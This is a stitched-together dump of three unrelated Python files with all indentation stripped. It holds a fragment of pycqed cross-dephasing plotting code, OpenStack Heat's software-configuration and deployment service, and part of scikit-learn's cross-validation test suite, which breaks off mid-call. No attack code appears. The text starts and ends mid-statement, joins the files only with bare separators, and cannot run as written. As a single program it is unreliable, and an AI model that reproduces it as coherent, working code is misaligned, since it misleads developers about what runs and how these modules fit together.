vmin=0, vmax=max(np.max(off_diagonal),0.01))
cbb = fig.colorbar(pb, cax=axins2)
axs.yaxis.set_ticklabels(yl)
axs.yaxis.set_ticks(yn)
axs.xaxis.set_ticklabels(xl)
axs.xaxis.set_ticks(xn)
#axs.cbar.set_label(pdict.get('zlabel', ''))
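# Minimal usage sketch (assumptions: a pycqed measurement environment where
# dephasing sweeps matching label_pattern exist; the qubit labels and
# timestamps below are placeholders, not real data).
def _example_cross_dephasing_usage():
    ca = CrossDephasingAnalysis(
        qubit_labels=['QL', 'QR'],
        t_start='20180101_120000', t_stop='20180101_180000',
        options_dict={'cmap': 'YlGn_r'},
        auto=False)           # auto=False defers run_analysis()
    ca.run_analysis()         # extract_data, run_fitting, prepare_plots
    # Gaussian dephasing widths, normalised per targeted qubit (see run_fitting)
    return ca.fit_dicts['sigmas_norm']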
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_db import api as oslo_db_api
from oslo_db import exception as db_exc
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_service import service
from oslo_utils import timeutils
import requests
import six
from six.moves.urllib import parse as urlparse
from heat.common import exception
from heat.common.i18n import _
from heat.common.i18n import _LI
from heat.db import api as db_api
from heat.engine import api
from heat.objects import software_config as software_config_object
from heat.objects import software_deployment as software_deployment_object
from heat.rpc import api as rpc_api
LOG = logging.getLogger(__name__)
class SoftwareConfigService(service.Service):
def show_software_config(self, cnxt, config_id):
sc = software_config_object.SoftwareConfig.get_by_id(cnxt, config_id)
return api.format_software_config(sc)
def list_software_configs(self, cnxt, limit=None, marker=None,
tenant_safe=True):
scs = software_config_object.SoftwareConfig.get_all(
cnxt,
limit=limit,
marker=marker,
tenant_safe=tenant_safe)
result = [api.format_software_config(sc, detail=False) for sc in scs]
return result
def create_software_config(self, cnxt, group, name, config,
inputs, outputs, options):
sc = software_config_object.SoftwareConfig.create(cnxt, {
'group': group,
'name': name,
'config': {
'inputs': inputs,
'outputs': outputs,
'options': options,
'config': config
},
'tenant': cnxt.tenant_id})
return api.format_software_config(sc)
def delete_software_config(self, cnxt, config_id):
software_config_object.SoftwareConfig.delete(cnxt, config_id)
def list_software_deployments(self, cnxt, server_id):
all_sd = software_deployment_object.SoftwareDeployment.get_all(
cnxt, server_id)
result = [api.format_software_deployment(sd) for sd in all_sd]
return result
def metadata_software_deployments(self, cnxt, server_id):
if not server_id:
raise ValueError(_('server_id must be specified'))
all_sd = software_deployment_object.SoftwareDeployment.get_all(
cnxt, server_id)
# sort the configs by config name, to give the list of metadata a
# deterministic and controllable order.
all_sd_s = sorted(all_sd, key=lambda sd: sd.config.name)
result = [api.format_software_config(sd.config) for sd in all_sd_s]
return result
@oslo_db_api.wrap_db_retry(max_retries=10, retry_on_request=True)
def _push_metadata_software_deployments(self, cnxt, server_id, sd):
rs = db_api.resource_get_by_physical_resource_id(cnxt, server_id)
if not rs:
return
deployments = self.metadata_software_deployments(cnxt, server_id)
md = rs.rsrc_metadata or {}
md['deployments'] = deployments
rows_updated = db_api.resource_update(
cnxt, rs.id, {'rsrc_metadata': md}, rs.atomic_key)
if not rows_updated:
raise db_exc.RetryRequest(
exception.DeploymentConcurrentTransaction(server=server_id))
metadata_put_url = None
metadata_queue_id = None
for rd in rs.data:
if rd.key == 'metadata_put_url':
metadata_put_url = rd.value
if rd.key == 'metadata_queue_id':
metadata_queue_id = rd.value
if metadata_put_url:
json_md = jsonutils.dumps(md)
requests.put(metadata_put_url, json_md)
if metadata_queue_id:
zaqar_plugin = cnxt.clients.client_plugin('zaqar')
zaqar = zaqar_plugin.create_for_tenant(sd.stack_user_project_id)
queue = zaqar.queue(metadata_queue_id)
queue.post({'body': md, 'ttl': zaqar_plugin.DEFAULT_TTL})
def _refresh_swift_software_deployment(self, cnxt, sd, deploy_signal_id):
container, object_name = urlparse.urlparse(
deploy_signal_id).path.split('/')[-2:]
swift_plugin = cnxt.clients.client_plugin('swift')
swift = swift_plugin.client()
try:
headers = swift.head_object(container, object_name)
except Exception as ex:
# ignore not-found, in case swift is not consistent yet
if swift_plugin.is_not_found(ex):
LOG.info(_LI('Signal object not found: %(c)s %(o)s'), {
'c': container, 'o': object_name})
return sd
raise ex
lm = headers.get('last-modified')
last_modified = swift_plugin.parse_last_modified(lm)
prev_last_modified = sd.updated_at
if prev_last_modified:
# assume stored as utc, convert to offset-naive datetime
prev_last_modified = prev_last_modified.replace(tzinfo=None)
if prev_last_modified and (last_modified <= prev_last_modified):
return sd
try:
(headers, obj) = swift.get_object(container, object_name)
except Exception as ex:
# ignore not-found, in case swift is not consistent yet
if swift_plugin.is_not_found(ex):
LOG.info(_LI(
'Signal object not found: %(c)s %(o)s'), {
'c': container, 'o': object_name})
return sd
raise ex
if obj:
self.signal_software_deployment(
cnxt, sd.id, jsonutils.loads(obj),
last_modified.isoformat())
return software_deployment_object.SoftwareDeployment.get_by_id(
cnxt, sd.id)
def _refresh_zaqar_software_deployment(self, cnxt, sd, deploy_queue_id):
zaqar_plugin = cnxt.clients.client_plugin('zaqar')
zaqar = zaqar_plugin.create_for_tenant(sd.stack_user_project_id)
queue = zaqar.queue(deploy_queue_id)
messages = list(queue.pop())
if messages:
self.signal_software_deployment(
cnxt, sd.id, messages[0].body, None)
return software_deployment_object.SoftwareDeployment.get_by_id(
cnxt, sd.id)
def show_software_deployment(self, cnxt, deployment_id):
sd = software_deployment_object.SoftwareDeployment.get_by_id(
cnxt, deployment_id)
if sd.status == rpc_api.SOFTWARE_DEPLOYMENT_IN_PROGRESS:
c = sd.config.config
input_values = dict((i['name'], i['value']) for i in c['inputs'])
transport = input_values.get('deploy_signal_transport')
if transport == 'TEMP_URL_SIGNAL':
sd = self._refresh_swift_software_deployment(
cnxt, sd, input_values.get('deploy_signal_id'))
elif transport == 'ZAQAR_SIGNAL':
sd = self._refresh_zaqar_software_deployment(
cnxt, sd, input_values.get('deploy_queue_id'))
return api.format_software_deployment(sd)
def create_software_deployment(self, cnxt, server_id, config_id,
input_values, action, status,
status_reason, stack_user_project_id):
sd = software_deployment_object.SoftwareDeployment.create(cnxt, {
'config_id': config_id,
'server_id': server_id,
'input_values': input_values,
'tenant': cnxt.tenant_id,
'stack_user_project_id': stack_user_project_id,
'action': action,
'status': status,
'status_reason': status_reason})
self._push_metadata_software_deployments(cnxt, server_id, sd)
return api.format_software_deployment(sd)
def signal_software_deployment(self, cnxt, deployment_id, details,
updated_at):
if not deployment_id:
raise ValueError(_('deployment_id must be specified'))
sd = software_deployment_object.SoftwareDeployment.get_by_id(
cnxt, deployment_id)
status = sd.status
if not status == rpc_api.SOFTWARE_DEPLOYMENT_IN_PROGRESS:
# output values are only expected when in an IN_PROGRESS state
return
details = details or {}
output_status_code = rpc_api.SOFTWARE_DEPLOYMENT_OUTPUT_STATUS_CODE
ov = sd.output_values or {}
status = None
status_reasons = {}
status_code = details.get(output_status_code)
if status_code and str(status_code) != '0':
status = rpc_api.SOFTWARE_DEPLOYMENT_FAILED
status_reasons[output_status_code] = _(
'Deployment exited with non-zero status code: %s'
) % details.get(output_status_code)
event_reason = 'deployment failed (%s)' % status_code
else:
event_reason = 'deployment succeeded'
for output in sd.config.config['outputs'] or []:
out_key = output['name']
if out_key in details:
ov[out_key] = details[out_key]
if output.get('error_output', False):
status = rpc_api.SOFTWARE_DEPLOYMENT_FAILED
status_reasons[out_key] = details[out_key]
event_reason = 'deployment failed'
for out_key in rpc_api.SOFTWARE_DEPLOYMENT_OUTPUTS:
ov[out_key] = details.get(out_key)
if status == rpc_api.SOFTWARE_DEPLOYMENT_FAILED:
# build a status reason out of all of the values of outputs
# flagged as error_output
status_reasons = [' : '.join((k, six.text_type(status_reasons[k])))
for k in status_reasons]
status_reason = ', '.join(status_reasons)
else:
status = rpc_api.SOFTWARE_DEPLOYMENT_COMPLETE
status_reason = _('Outputs received')
self.update_software_deployment(
cnxt, deployment_id=deployment_id,
output_values=ov, status=status, status_reason=status_reason,
config_id=None, input_values=None, action=None,
updated_at=updated_at)
# Return a string describing the outcome of handling the signal data
return event_reason
def update_software_deployment(self, cnxt, deployment_id, config_id,
input_values, output_values, action,
status, status_reason, updated_at):
update_data = {}
if config_id:
update_data['config_id'] = config_id
if input_values:
update_data['input_values'] = input_values
if output_values:
update_data['output_values'] = output_values
if action:
update_data['action'] = action
if status:
update_data['status'] = status
if status_reason:
update_data['status_reason'] = status_reason
if updated_at:
update_data['updated_at'] = timeutils.normalize_time(
timeutils.parse_isotime(updated_at))
else:
update_data['updated_at'] = timeutils.utcnow()
sd = software_deployment_object.SoftwareDeployment.update_by_id(
cnxt, deployment_id, update_data)
# only push metadata if this update resulted in the config_id
# changing, since metadata is just a list of configs
if config_id:
self._push_metadata_software_deployments(cnxt, sd.server_id, sd)
return api.format_software_deployment(sd)
def delete_software_deployment(self, cnxt, deployment_id):
software_deployment_object.SoftwareDeployment.delete(
cnxt, deployment_id)
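# Standalone sketch of the optimistic-locking pattern used by
# _push_metadata_software_deployments() above: the resource row carries an
# atomic_key, the metadata UPDATE only succeeds if nobody bumped that key in
# the meantime, and a failed update raises RetryRequest so the
# @oslo_db_api.wrap_db_retry decorator re-runs the whole method.
# 'update_row' below is a hypothetical stand-in for db_api.resource_update.
def _example_optimistic_update(update_row, resource, new_metadata):
    rows_updated = update_row(resource.id,
                              {'rsrc_metadata': new_metadata},
                              expected_atomic_key=resource.atomic_key)
    if not rows_updated:
        # lost the race -- let wrap_db_retry call us again with fresh data
        raise db_exc.RetryRequest(Exception('concurrent metadata update'))
    return True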
|
|
"""Test the validation module"""
from __future__ import division
import sys
import warnings
import tempfile
import os
from time import sleep
import numpy as np
from scipy.sparse import coo_matrix, csr_matrix
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_warns
from sklearn.utils.mocking import CheckingClassifier, MockDataFrame
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.model_selection import permutation_test_score
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import LeaveOneOut
from sklearn.model_selection import LeaveOneLabelOut
from sklearn.model_selection import LeavePLabelOut
from sklearn.model_selection import LabelKFold
from sklearn.model_selection import LabelShuffleSplit
from sklearn.model_selection import learning_curve
from sklearn.model_selection import validation_curve
from sklearn.model_selection._validation import _check_is_permutation
from sklearn.datasets import make_regression
from sklearn.datasets import load_boston
from sklearn.datasets import load_iris
from sklearn.metrics import explained_variance_score
from sklearn.metrics import make_scorer
from sklearn.metrics import precision_score
from sklearn.linear_model import Ridge, LogisticRegression
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.cluster import KMeans
from sklearn.preprocessing import Imputer
from sklearn.pipeline import Pipeline
from sklearn.externals.six.moves import cStringIO as StringIO
from sklearn.base import BaseEstimator
from sklearn.multiclass import OneVsRestClassifier
from sklearn.utils import shuffle
from sklearn.datasets import make_classification
from sklearn.datasets import make_multilabel_classification
from sklearn.model_selection.tests.test_split import MockClassifier
try:
WindowsError
except NameError:
WindowsError = None
class MockImprovingEstimator(BaseEstimator):
"""Dummy classifier to test the learning curve"""
def __init__(self, n_max_train_sizes):
self.n_max_train_sizes = n_max_train_sizes
self.train_sizes = 0
self.X_subset = None
def fit(self, X_subset, y_subset=None):
self.X_subset = X_subset
self.train_sizes = X_subset.shape[0]
return self
def predict(self, X):
raise NotImplementedError
def score(self, X=None, Y=None):
# training score becomes worse (2 -> 1), test error better (0 -> 1)
if self._is_training_data(X):
return 2. - float(self.train_sizes) / self.n_max_train_sizes
else:
return float(self.train_sizes) / self.n_max_train_sizes
def _is_training_data(self, X):
return X is self.X_subset
class MockIncrementalImprovingEstimator(MockImprovingEstimator):
"""Dummy classifier that provides partial_fit"""
def __init__(self, n_max_train_sizes):
super(MockIncrementalImprovingEstimator,
self).__init__(n_max_train_sizes)
self.x = None
def _is_training_data(self, X):
return self.x in X
def partial_fit(self, X, y=None, **params):
self.train_sizes += X.shape[0]
self.x = X[0]
class MockEstimatorWithParameter(BaseEstimator):
"""Dummy classifier to test the validation curve"""
def __init__(self, param=0.5):
self.X_subset = None
self.param = param
def fit(self, X_subset, y_subset):
self.X_subset = X_subset
self.train_sizes = X_subset.shape[0]
return self
def predict(self, X):
raise NotImplementedError
def score(self, X=None, y=None):
return self.param if self._is_training_data(X) else 1 - self.param
def _is_training_data(self, X):
return X is self.X_subset
# XXX: use 2D array, since 1D X is being detected as a single sample in
# check_consistent_length
X = np.ones((10, 2))
X_sparse = coo_matrix(X)
y = np.array([0, 0, 1, 1, 2, 2, 3, 3, 4, 4])
# The number of samples per class needs to be > n_splits,
# for StratifiedKFold(n_splits=3)
y2 = np.array([1, 1, 1, 2, 2, 2, 3, 3, 3, 3])
def test_cross_val_score():
clf = MockClassifier()
for a in range(-10, 10):
clf.a = a
# Smoke test
scores = cross_val_score(clf, X, y2)
assert_array_equal(scores, clf.score(X, y2))
# test with multioutput y
multioutput_y = np.column_stack([y2, y2[::-1]])
scores = cross_val_score(clf, X_sparse, multioutput_y)
assert_array_equal(scores, clf.score(X_sparse, multioutput_y))
scores = cross_val_score(clf, X_sparse, y2)
assert_array_equal(scores, clf.score(X_sparse, y2))
# test with multioutput y
scores = cross_val_score(clf, X_sparse, multioutput_y)
assert_array_equal(scores, clf.score(X_sparse, multioutput_y))
# test with X and y as list
list_check = lambda x: isinstance(x, list)
clf = CheckingClassifier(check_X=list_check)
scores = cross_val_score(clf, X.tolist(), y2.tolist())
clf = CheckingClassifier(check_y=list_check)
scores = cross_val_score(clf, X, y2.tolist())
assert_raises(ValueError, cross_val_score, clf, X, y2, scoring="sklearn")
    # test with 3d X
X_3d = X[:, :, np.newaxis]
clf = MockClassifier(allow_nd=True)
scores = cross_val_score(clf, X_3d, y2)
clf = MockClassifier(allow_nd=False)
assert_raises(ValueError, cross_val_score, clf, X_3d, y2)
def test_cross_val_score_predict_labels():
# Check if ValueError (when labels is None) propagates to cross_val_score
# and cross_val_predict
# And also check if labels is correctly passed to the cv object
X, y = make_classification(n_samples=20, n_classes=2, random_state=0)
clf = SVC(kernel="linear")
label_cvs = [LeaveOneLabelOut(), LeavePLabelOut(2), LabelKFold(),
LabelShuffleSplit()]
for cv in label_cvs:
assert_raise_message(ValueError,
"The labels parameter should not be None",
cross_val_score, estimator=clf, X=X, y=y, cv=cv)
assert_raise_message(ValueError,
"The labels parameter should not be None",
cross_val_predict, estimator=clf, X=X, y=y, cv=cv)
def test_cross_val_score_pandas():
# check cross_val_score doesn't destroy pandas dataframe
types = [(MockDataFrame, MockDataFrame)]
try:
from pandas import Series, DataFrame
types.append((Series, DataFrame))
except ImportError:
pass
for TargetType, InputFeatureType in types:
# X dataframe, y series
        # 3 fold cross val is used so we need at least 3 samples per class
X_df, y_ser = InputFeatureType(X), TargetType(y2)
check_df = lambda x: isinstance(x, InputFeatureType)
check_series = lambda x: isinstance(x, TargetType)
clf = CheckingClassifier(check_X=check_df, check_y=check_series)
cross_val_score(clf, X_df, y_ser)
def test_cross_val_score_mask():
# test that cross_val_score works with boolean masks
svm = SVC(kernel="linear")
iris = load_iris()
X, y = iris.data, iris.target
kfold = KFold(5)
scores_indices = cross_val_score(svm, X, y, cv=kfold)
kfold = KFold(5)
cv_masks = []
for train, test in kfold.split(X, y):
mask_train = np.zeros(len(y), dtype=np.bool)
mask_test = np.zeros(len(y), dtype=np.bool)
mask_train[train] = 1
mask_test[test] = 1
cv_masks.append((train, test))
scores_masks = cross_val_score(svm, X, y, cv=cv_masks)
assert_array_equal(scores_indices, scores_masks)
def test_cross_val_score_precomputed():
# test for svm with precomputed kernel
svm = SVC(kernel="precomputed")
iris = load_iris()
X, y = iris.data, iris.target
linear_kernel = np.dot(X, X.T)
score_precomputed = cross_val_score(svm, linear_kernel, y)
svm = SVC(kernel="linear")
score_linear = cross_val_score(svm, X, y)
assert_array_equal(score_precomputed, score_linear)
# Error raised for non-square X
svm = SVC(kernel="precomputed")
assert_raises(ValueError, cross_val_score, svm, X, y)
# test error is raised when the precomputed kernel is not array-like
# or sparse
assert_raises(ValueError, cross_val_score, svm,
linear_kernel.tolist(), y)
def test_cross_val_score_fit_params():
clf = MockClassifier()
n_samples = X.shape[0]
n_classes = len(np.unique(y))
W_sparse = coo_matrix((np.array([1]), (np.array([1]), np.array([0]))),
shape=(10, 1))
P_sparse = coo_matrix(np.eye(5))
DUMMY_INT = 42
DUMMY_STR = '42'
DUMMY_OBJ = object()
def assert_fit_params(clf):
# Function to test that the values are passed correctly to the
# classifier arguments for non-array type
assert_equal(clf.dummy_int, DUMMY_INT)
assert_equal(clf.dummy_str, DUMMY_STR)
assert_equal(clf.dummy_obj, DUMMY_OBJ)
fit_params = {'sample_weight': np.ones(n_samples),
'class_prior': np.ones(n_classes) / n_classes,
'sparse_sample_weight': W_sparse,
'sparse_param': P_sparse,
'dummy_int': DUMMY_INT,
'dummy_str': DUMMY_STR,
'dummy_obj': DUMMY_OBJ,
'callback': assert_fit_params}
cross_val_score(clf, X, y, fit_params=fit_params)
def test_cross_val_score_score_func():
clf = MockClassifier()
_score_func_args = []
def score_func(y_test, y_predict):
_score_func_args.append((y_test, y_predict))
return 1.0
with warnings.catch_warnings(record=True):
scoring = make_scorer(score_func)
score = cross_val_score(clf, X, y, scoring=scoring)
assert_array_equal(score, [1.0, 1.0, 1.0])
assert len(_score_func_args) == 3
def test_cross_val_score_errors():
class BrokenEstimator:
pass
assert_raises(TypeError, cross_val_score, BrokenEstimator(), X)
def test_cross_val_score_with_score_func_classification():
iris = load_iris()
clf = SVC(kernel='linear')
# Default score (should be the accuracy score)
scores = cross_val_score(clf, iris.data, iris.target, cv=5)
assert_array_almost_equal(scores, [0.97, 1., 0.97, 0.97, 1.], 2)
# Correct classification score (aka. zero / one score) - should be the
# same as the default estimator score
zo_scores = cross_val_score(clf, iris.data, iris.target,
scoring="accuracy", cv=5)
assert_array_almost_equal(zo_scores, [0.97, 1., 0.97, 0.97, 1.], 2)
    # F1 score (classes are balanced, so f1_score should be equal to the
    # zero/one score)
f1_scores = cross_val_score(clf, iris.data, iris.target,
scoring="f1_weighted", cv=5)
assert_array_almost_equal(f1_scores, [0.97, 1., 0.97, 0.97, 1.], 2)
def test_cross_val_score_with_score_func_regression():
X, y = make_regression(n_samples=30, n_features=20, n_informative=5,
random_state=0)
reg = Ridge()
# Default score of the Ridge regression estimator
scores = cross_val_score(reg, X, y, cv=5)
assert_array_almost_equal(scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
    # R2 score (aka. coefficient of determination) - should be the
# same as the default estimator score
r2_scores = cross_val_score(reg, X, y, scoring="r2", cv=5)
assert_array_almost_equal(r2_scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
# Mean squared error; this is a loss function, so "scores" are negative
mse_scores = cross_val_score(reg, X, y, cv=5, scoring="mean_squared_error")
expected_mse = np.array([-763.07, -553.16, -274.38, -273.26, -1681.99])
assert_array_almost_equal(mse_scores, expected_mse, 2)
# Explained variance
scoring = make_scorer(explained_variance_score)
ev_scores = cross_val_score(reg, X, y, cv=5, scoring=scoring)
assert_array_almost_equal(ev_scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
def test_permutation_score():
iris = load_iris()
X = iris.data
X_sparse = coo_matrix(X)
y = iris.target
svm = SVC(kernel='linear')
cv = StratifiedKFold(2)
score, scores, pvalue = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy")
assert_greater(score, 0.9)
assert_almost_equal(pvalue, 0.0, 1)
score_label, _, pvalue_label = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy",
labels=np.ones(y.size), random_state=0)
assert_true(score_label == score)
assert_true(pvalue_label == pvalue)
# check that we obtain the same results with a sparse representation
svm_sparse = SVC(kernel='linear')
cv_sparse = StratifiedKFold(2)
score_label, _, pvalue_label = permutation_test_score(
svm_sparse, X_sparse, y, n_permutations=30, cv=cv_sparse,
scoring="accuracy", labels=np.ones(y.size), random_state=0)
assert_true(score_label == score)
assert_true(pvalue_label == pvalue)
# test with custom scoring object
def custom_score(y_true, y_pred):
return (((y_true == y_pred).sum() - (y_true != y_pred).sum()) /
y_true.shape[0])
scorer = make_scorer(custom_score)
score, _, pvalue = permutation_test_score(
svm, X, y, n_permutations=100, scoring=scorer, cv=cv, random_state=0)
assert_almost_equal(score, .93, 2)
assert_almost_equal(pvalue, 0.01, 3)
# set random y
y = np.mod(np.arange(len(y)), 3)
score, scores, pvalue = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy")
assert_less(score, 0.5)
assert_greater(pvalue, 0.2)
def test_permutation_test_score_allow_nans():
# Check that permutation_test_score allows input data with NaNs
X = np.arange(200, dtype=np.float64).reshape(10, -1)
X[2, :] = np.nan
y = np.repeat([0, 1], X.shape[0] / 2)
p = Pipeline([
('imputer', Imputer(strategy='mean', missing_values='NaN')),
('classifier', MockClassifier()),
])
permutation_test_score(p, X, y, cv=5)
def test_cross_val_score_allow_nans():
# Check that cross_val_score allows input data with NaNs
X = np.arange(200, dtype=np.float64).reshape(10, -1)
X[2, :] = np.nan
y = np.repeat([0, 1], X.shape[0] / 2)
p = Pipeline([
('imputer', Imputer(strategy='mean', missing_values='NaN')),
('classifier', MockClassifier()),
])
cross_val_score(p, X, y, cv=5)
def test_cross_val_score_multilabel():
X = np.array([[-3, 4], [2, 4], [3, 3], [0, 2], [-3, 1],
[-2, 1], [0, 0], [-2, -1], [-1, -2], [1, -2]])
y = np.array([[1, 1], [0, 1], [0, 1], [0, 1], [1, 1],
[0, 1], [1, 0], [1, 1], [1, 0], [0, 0]])
clf = KNeighborsClassifier(n_neighbors=1)
scoring_micro = make_scorer(precision_score, average='micro')
scoring_macro = make_scorer(precision_score, average='macro')
scoring_samples = make_scorer(precision_score, average='samples')
score_micro = cross_val_score(clf, X, y, scoring=scoring_micro, cv=5)
score_macro = cross_val_score(clf, X, y, scoring=scoring_macro, cv=5)
score_samples = cross_val_score(clf, X, y, scoring=scoring_samples, cv=5)
assert_almost_equal(score_micro, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 3])
assert_almost_equal(score_macro, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 4])
assert_almost_equal(score_samples, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 4])
def test_cross_val_predict():
boston = load_boston()
X, y = boston.data, boston.target
cv = KFold()
est = Ridge()
# Naive loop (should be same as cross_val_predict):
preds2 = np.zeros_like(y)
for train, test in cv.split(X, y):
est.fit(X[train], y[train])
preds2[test] = est.predict(X[test])
preds = cross_val_predict(est, X, y, cv=cv)
assert_array_almost_equal(preds, preds2)
preds = cross_val_predict(est, X, y)
assert_equal(len(preds), len(y))
cv = LeaveOneOut()
preds = cross_val_predict(est, X, y, cv=cv)
assert_equal(len(preds), len(y))
Xsp = X.copy()
Xsp *= (Xsp > np.median(Xsp))
Xsp = coo_matrix(Xsp)
preds = cross_val_predict(est, Xsp, y)
assert_array_almost_equal(len(preds), len(y))
preds = cross_val_predict(KMeans(), X)
assert_equal(len(preds), len(y))
class BadCV():
def split(self, X, y=None, labels=None):
for i in range(4):
yield np.array([0, 1, 2, 3]), np.array([4, 5, 6, 7, 8])
assert_raises(ValueError, cross_val_predict, est, X, y, cv=BadCV())
def test_cross_val_predict_input_types():
iris = load_iris()
X, y = iris.data, iris.target
X_sparse = coo_matrix(X)
multioutput_y = np.column_stack([y, y[::-1]])
clf = Ridge(fit_intercept=False, random_state=0)
    # 3 fold cv is used --> at least 3 samples per class
# Smoke test
predictions = cross_val_predict(clf, X, y)
assert_equal(predictions.shape, (150,))
# test with multioutput y
predictions = cross_val_predict(clf, X_sparse, multioutput_y)
assert_equal(predictions.shape, (150, 2))
predictions = cross_val_predict(clf, X_sparse, y)
assert_array_equal(predictions.shape, (150,))
# test with multioutput y
predictions = cross_val_predict(clf, X_sparse, multioutput_y)
assert_array_equal(predictions.shape, (150, 2))
# test with X and y as list
list_check = lambda x: isinstance(x, list)
clf = CheckingClassifier(check_X=list_check)
predictions = cross_val_predict(clf, X.tolist(), y.tolist())
clf = CheckingClassifier(check_y=list_check)
predictions = cross_val_predict(clf, X, y.tolist())
    # test with 3d X
X_3d = X[:, :, np.newaxis]
check_3d = lambda x: x.ndim == 3
clf = CheckingClassifier(check_X=check_3d)
predictions = cross_val_predict(clf, X_3d, y)
assert_array_equal(predictions.shape, (150,))
def test_cross_val_predict_pandas():
# check cross_val_score doesn't destroy pandas dataframe
types = [(MockDataFrame, MockDataFrame)]
try:
from pandas import Series, DataFrame
types.append((Series, DataFrame))
except ImportError:
pass
for TargetType, InputFeatureType in types:
# X dataframe, y series
X_df, y_ser = InputFeatureType(X), TargetType(y2)
check_df = lambda x: isinstance(x, InputFeatureType)
check_series = lambda x: isinstance(x, TargetType)
clf = CheckingClassifier(check_X=check_df, check_y=check_series)
cross_val_predict(clf, X_df, y_ser)
def test_cross_val_score_sparse_fit_params():
iris = load_iris()
X, y = iris.data, iris.target
clf = MockClassifier()
fit_params = {'sparse_sample_weight': coo_matrix(np.eye(X.shape[0]))}
a = cross_val_score(clf, X, y, fit_params=fit_params)
assert_array_equal(a, np.ones(3))
def test_learning_curve():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
with warnings.catch_warnings(record=True) as w:
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=3, train_sizes=np.linspace(0.1, 1.0, 10))
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_equal(train_scores.shape, (10, 3))
assert_equal(test_scores.shape, (10, 3))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_unsupervised():
X, _ = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y=None, cv=3, train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_verbose():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
train_sizes, train_scores, test_scores = \
learning_curve(estimator, X, y, cv=3, verbose=1)
finally:
out = sys.stdout.getvalue()
sys.stdout.close()
sys.stdout = old_stdout
assert("[learning_curve]" in out)
def test_learning_curve_incremental_learning_not_possible():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
# The mockup does not have partial_fit()
estimator = MockImprovingEstimator(1)
assert_raises(ValueError, learning_curve, estimator, X, y,
exploit_incremental_learning=True)
def test_learning_curve_incremental_learning():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockIncrementalImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=3, exploit_incremental_learning=True,
train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_incremental_learning_unsupervised():
X, _ = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockIncrementalImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y=None, cv=3, exploit_incremental_learning=True,
train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_batch_and_incremental_learning_are_equal():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
train_sizes = np.linspace(0.2, 1.0, 5)
estimator = PassiveAggressiveClassifier(n_iter=1, shuffle=False)
train_sizes_inc, train_scores_inc, test_scores_inc = \
learning_curve(
estimator, X, y, train_sizes=train_sizes,
cv=3, exploit_incremental_learning=True)
train_sizes_batch, train_scores_batch, test_scores_batch = \
learning_curve(
estimator, X, y, cv=3, train_sizes=train_sizes,
